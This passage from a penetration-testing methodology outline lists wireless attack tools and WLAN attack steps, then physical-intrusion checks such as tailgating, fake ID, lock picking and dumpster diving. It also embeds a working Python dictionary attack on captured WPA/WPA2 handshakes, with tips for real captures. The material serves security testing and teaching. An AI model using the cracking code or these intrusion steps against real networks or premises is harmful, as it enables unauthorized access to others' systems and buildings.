26.2.1.16. WirelessMon

26.2.1.17. WiFiFoFum

26.2.2. Packet Capture

26.2.2.1. Airopeek

26.2.2.2. Airpcap

26.2.2.3. Airtraf

26.2.2.4. Apsniff

26.2.2.5. Cain

26.2.2.6. Commview

26.2.2.7. Ettercap

26.2.2.8. Netmon

26.2.2.8.1. nmwifi

26.2.2.9. Wireshark

26.2.3. EAP Attack tools

26.2.3.1. eapmd5pass

26.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

26.2.4. Leap Attack Tools

26.2.4.1. asleap

26.2.4.2. thc leap cracker

26.2.4.3. anwrap

26.2.5. WEP/ WPA Password Attack Tools

26.2.5.1. Airbase

26.2.5.2. Aircrack-ptw

26.2.5.3. Aircrack-ng

26.2.5.4. Airsnort

26.2.5.5. cowpatty

26.2.5.6. FiOS Wireless Key Calculator

26.2.5.7. iWifiHack

26.2.5.8. KisMAC-ng

26.2.5.9. Rainbow Tables

26.2.5.10. wep attack

26.2.5.11. wep crack

26.2.5.12. wzcook

26.2.6. Frame Generation Software

26.2.6.1. Airgobbler

26.2.6.2. airpwn

26.2.6.3. Airsnarf

26.2.6.4. Commview

26.2.6.5. fake ap

26.2.6.6. void 11

26.2.6.7. wifi tap

26.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

26.2.6.8. FreeRADIUS - Wireless Pwnage Edition

26.2.7. Mapping Software

26.2.7.1. Online Mapping

26.2.7.1.1. WIGLE

26.2.7.1.2. Skyhook

26.2.7.2. Tools

26.2.7.2.1. Knsgem

26.2.8. File Format Conversion Tools

26.2.8.1. ns1 recovery and conversion tool

26.2.8.2. warbable

26.2.8.3. warkizniz

26.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

26.2.8.4. ivstools

26.2.9. IDS Tools

26.2.9.1. WIDZ

26.2.9.2. War Scanner

26.2.9.3. Snort-Wireless

26.2.9.4. AirDefense

26.2.9.5. AirMagnet

26.3. WLAN discovery

26.3.1. Unencrypted WLAN

26.3.1.1. Visible SSID

26.3.1.1.1. Sniff for IP range

26.3.1.2. Hidden SSID

26.3.1.2.1. Deauth client

26.3.2. WEP encrypted WLAN

26.3.2.1. Visible SSID

26.3.2.1.1. WEPattack

26.3.2.2. Hidden SSID

26.3.2.2.1. Deauth client

26.3.3. WPA / WPA2 encrypted WLAN

26.3.3.1. Deauth client

26.3.3.1.1. Capture EAPOL handshake
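
What the captured EAPOL handshake is used for, as an added example that is not part of the original framework: this is the calculation cowpatty and aircrack-ng run once the deauth has produced a four-way handshake. The PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID, the PTK is derived from the PMK, the two MAC addresses and the two nonces, and the first 16 bytes of the PTK key the MIC on the EAPOL frames, so each candidate passphrase is confirmed or rejected against the MIC in message 2. The handshake below is constructed with a known passphrase so the result can be checked; the SSID, MACs and nonces are made up.

```python
"""Offline dictionary attack on a captured WPA/WPA2-PSK four-way handshake: the computation that
cowpatty and aircrack-ng run once the deauth has produced an EAPOL exchange.  Added example for
this step, not code from the original framework.  The handshake below is constructed with a known
passphrase so the result can be checked; MACs and nonces are random."""
import hashlib
import hmac
import os

# EAPOL-Key layout: 802.1X header (1+1+2) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81 bytes before the 16-byte MIC.
MIC_OFFSET = 81


def pmk(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed tables only help for one SSID at a time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck(pmk_bytes, aa, spa, anonce, snonce):
    """Key Confirmation Key = first 16 bytes of the PTK, from PRF-X(PMK, "Pairwise key expansion",
    min(AA,SPA) | max(AA,SPA) | min(ANonce,SNonce) | max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(2):          # two SHA1 blocks (40 bytes) cover the 16-byte KCK
        out += hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:16]


def eapol_mic(kck_bytes, eapol, wpa2=True):
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1 truncated to 16 bytes for
    WPA2 (descriptor version 2), HMAC-MD5 for WPA/TKIP (descriptor version 1)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck_bytes, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def crack(hs, wordlist):
    """hs: ssid, aa, spa, anonce, snonce, eapol (message 2 bytes), wpa2.  Returns passphrase or None."""
    target = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        if not 8 <= len(word) <= 63:          # outside the 802.11i passphrase length rule
            continue
        k = kck(pmk(word, hs["ssid"]), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(k, hs["eapol"], hs["wpa2"]), target):
            return word
    return None


def make_handshake(passphrase, ssid="TargetNet", wpa2=True):
    """Constructed capture: a minimal EAPOL-Key message 2 (the client's reply carrying SNonce and
    the first MIC) with a valid MIC under the given passphrase."""
    aa, spa = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    key_info = b"\x01\x0a" if wpa2 else b"\x01\x09"   # MIC + pairwise bits, descriptor version 2 or 1
    body = (b"\x02" + key_info + b"\x00\x00" + b"\x00" * 8 + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # version 1, type 3 = EAPOL-Key
    mic = eapol_mic(kck(pmk(passphrase, ssid), aa, spa, anonce, snonce), eapol, wpa2)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "wpa2": wpa2}


if __name__ == "__main__":
    print(crack(make_handshake("letmein99"), ["password", "12345678", "letmein99"]))  # letmein99
```

Two things to keep in mind when pointing this at a real capture: you need both nonces, so at least messages 1 and 2 (or 2 and 3) of the same handshake must be present, and the 4096-iteration PBKDF2 is the whole cost of the attack, which is why cowpatty's genpmk precomputes PMKs per SSID rather than per handshake.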

26.3.4. LEAP encrypted WLAN

26.3.4.1. Deauth client

26.3.4.1.1. Break LEAP

26.3.5. 802.1X WLAN

26.3.5.1. Create Rogue Access Point

26.3.5.1.1. Airsnarf

26.3.5.1.2. fake ap

26.3.5.1.3. Hotspotter

26.3.5.1.4. Karma

26.3.5.1.5. Linux rogue AP

26.3.6. Resources

26.3.6.1. URLs

26.3.6.1.1. Wirelessdefence.org

26.3.6.1.2. Russix

26.3.6.1.3. Wardrive.net

26.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

26.3.6.2. White Papers

26.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

26.3.6.2.2. 802.11b Firmware-Level Attacks

26.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

26.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

26.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

26.3.6.2.6. PEAP - ShmooCon 2008, Wright & Antoniewicz

26.3.6.2.7. Active behavioral fingerprinting of wireless devices

26.3.6.3. Common Vulnerabilities and Exposures (CVE)

26.3.6.3.1. Vulnerability and exploit information relating to these products can be found at: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

27. Physical Security

27.1. Building Security

27.1.1. Meeting Rooms

27.1.1.1. Check for active network jacks.

27.1.1.2. Check for any information in room.

27.1.2. Lobby

27.1.2.1. Check for active network jacks.

27.1.2.2. Does receptionist/guard leave lobby?

27.1.2.3. Accessible printers? Print a test page.

27.1.2.4. Obtain phone/personnel listing.

27.1.3. Communal Areas

27.1.3.1. Check for active network jacks.

27.1.3.2. Check for any information in room.

27.1.3.3. Listen for employee conversations.

27.1.4. Room Security

27.1.4.1. Resistance of lock to picking.

27.1.4.1.1. What types of lock are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

27.1.4.2. Ceiling access areas.

27.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

27.1.5. Windows

27.1.5.1. Check windows/doors for visible intruder alarm sensors.

27.1.5.2. Check visible areas for sensitive information.

27.1.5.3. Can you video users logging on?

27.2. Perimeter Security

27.2.1. Fence Security

27.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

27.2.2. Exterior Doors

27.2.2.1. If there is no perimeter fence, determine whether the exterior doors are secured, guarded and monitored.

27.2.3. Guards

27.2.3.1. Patrol Routines

27.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

27.2.3.2. Communications

27.2.3.2.1. Intercept and analyse guard communications. Determine whether the communication methods can be used to aid a physical intrusion.

27.3. Entry Points

27.3.1. Guarded Doors

27.3.1.1. Piggybacking

27.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

27.3.1.2. Fake ID

27.3.1.2.1. Attempt to use fake ID to gain access.

27.3.1.3. Access Methods

27.3.1.3.1. Test 'out of hours' entry methods

27.3.2. Unguarded Doors

27.3.2.1. Identify all unguarded entry points.

27.3.2.1.1. Are doors secured?

27.3.2.1.2. Check locks for resistance to lock picking.

27.3.3. Windows

27.3.3.1. Check windows/doors for visible intruder alarm sensors.

27.3.3.1.1. Attempt to bypass sensors.

27.4. Office Waste

27.4.1. Dumpster Diving. Attempt to retrieve any useful information from the refuse of the target of evaluation (ToE). This may include printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.

28. Final Report - template

29. Contributors

29.1. Matt Byrne (WirelessDefence.org)

29.1.1. Matt contributed the majority of the Wireless section.

29.2. Arvind Doraiswamy (Paladion.net)

29.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

29.3. Lee Lawson (Dns.co.uk)

29.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

29.4. Nabil OUCHN (Security-database.com)